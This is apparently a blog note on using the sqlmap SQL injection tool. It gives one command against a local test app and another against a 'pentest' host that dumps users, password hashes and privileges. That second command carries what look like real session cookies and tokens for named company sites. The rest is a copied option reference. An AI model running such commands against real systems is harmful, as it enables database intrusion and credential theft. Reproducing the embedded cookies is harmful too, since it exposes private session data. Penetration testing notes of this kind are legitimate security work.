• sqlmap


    https://github.com/sqlmapproject/sqlmap

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

    http://sqlmap.org/

    测试用例

    http://localhost:8086/project/controller/action (POST) # C:UserscluDownloadssqlmapproject-sqlmap-d4d83b2sqlmap.py -u http://localhost:8086/project/controller/action --data=search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

    search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

    %userprofile%AppDataLocalsqlmapoutputlocalhost

     .sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=D9DB90E84FE929C84DB3C85E98AE621C5866E18BC145A78037513899550B3CA1039C2E89B3B8FED91E2EBFD0FB210E156C14C94C1E03112CCA2A81F5923D7421A7DF72E09A6551AA3485B380362E69ABA5B025EEA6AB8AFA712D19859EF6C2654C61C14F17A09F87F330BAC4D0440C87E74E778EF6E3D6D00E54CCE964C8B83995287D2CBA4576422C7FAD7B2C3D61A2CE47064FFCE860C8C589EA9E3F3994FDDB9F49C889E9A4380A57C6C2022503A54F15A98705F1F0A9DDC51795CDF614558C9C9D7D29085F27143F78D3EB8F3BC220DBA41BC257BFC941413B16DBA2A015318417A4F9261C105DE0703176DB969D48D89FC3C945258E415AAD9CB927EFB43B88F37DF0ACA143423F0B22CB6804E5931466F243A939474B3EA80AE7EF32959106A5B062C62C5FB26E63F8; EdenredParticipantSite=711332B299FB9664209A49D30D437D637D5A4E181980464C896E36530CE845C19F8E3CACAD91DCC386385050164D33AD9E74F6195D91A210291F260AC5371BD831B6094C7B5723858FB8FE4654DB793C25835355593FDE328D4F6E35192FE58742E85A29B669175C8B7FC4DB1252E75FD43EA254EBBA26CEACC1EFAB8CBCC18E83CB48B80FDE3B22DA3D3B369E49F6C5BBF2D8D36CDA2D9A1258CF6DB6C43049883F88992C07EF2B51D56E95E670FB878FE8F77DAF0E21BD45B668D28563A1669234602C188290EF6187D3AC99BFCA92ADFDCE86226F4443D7DDEFA1C46B4D4373DA392837D7CE27C630008303D1E50665E689B8C4D2DE4402D051C7CB5A06320185FAF86A85AAB05B1BA1EDCBEAF45D7974610C3D3E9DC388C600238B56E2324AC274C9E315F3004CA2C08F3CEA38538FE34435" --delay=0 --timeout=30 -retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"

    参数说明

    https://github.com/sqlmapproject/sqlmap/wiki/Usage

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    -p TESTPARAMETER    Testable parameter(s)

    --dbms=DBMS Force back-end DBMS to provided value
    -os=OS             Force back-end DBMS operating system to provided value
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK Risk of tests to perform (1-3, default 1)
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

    Enumeration:
        These options can be used to enumerate the back-end database
        management system information, structure and data contained in the
        tables. Moreover you can run your own SQL statements
     
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs Enumerate DBMS databases
    General:
        These options can be used to set some general working parameters
     
    --batch             Never ask for user input, use the default behavior
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
     
  • 相关阅读:
    多区域显示(5)-粘贴为图片链接
    coco2d-x怎样创建project
    把数组排成最小的数
    前端框架 EasyUI (1)熟悉一下EasyUI
    easyui form 方式提交数据
    Jquery插件easyUi表单验证提交
    EASYUI 表单(FORM)用法
    easyui form submit 不提交
    JQuery Easy Ui dataGrid 数据表格
    EasyUI datagrid 格式化显示数据
  • 原文地址:https://www.cnblogs.com/chucklu/p/13158070.html
Copyright © 2020-2023  润新知